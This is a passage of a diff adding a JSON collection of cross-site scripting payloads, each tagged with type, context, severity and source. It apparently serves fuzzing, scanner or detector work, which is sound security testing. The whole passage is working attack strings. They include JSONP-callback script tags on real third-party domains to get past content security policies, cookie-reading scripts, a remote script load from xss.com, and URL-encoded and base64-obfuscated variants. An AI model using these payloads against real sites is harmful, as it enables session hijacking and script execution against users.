"high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?callback=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?getURLValue=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?goto=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?pg=javascript:alert(1)\",", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?page=javascript:alert(1)\"", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "?playerready=alert(document.cookie)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "critical", + "source": "xss_swf_fuzz" + } + }, + { + "payload": "\"><script+src=\"https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://api.vk.com/method/wall.get?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://suggest.taobao.com/sug?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://count.tbcdn.cn//counter3?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://wb.amap.com/channel.php?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://search.twitter.com/trends.json?callback=alert()\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://passport.ngs.ru/ajax/check?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://ulogin.ru/token.php?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://api.mixpanel.com/track/?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script+src=\"https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\\\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "\"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "ng-app\"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "jsonp_endpoint" + } + }, + { + "payload": "'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<<scr\\0ipt/src=http://xss.com/xss.js></script", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "' onmouseover=alert(/Black.Spook/)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "\"><iframe%20src=\"http://google.com\"%%203E", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "'<script>window.onload=function(){document.forms[0].message.value='1';}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "x”</title><img src%3dx onerror%3dalert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "html", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>alert(document.head.innerHTML.substr(146,20));</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>alert(document.head.childNodes[3].text)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script for=document event=onreadystatechange>getElementById('safe123').click()</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "critical", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();", + "category": "xss", + 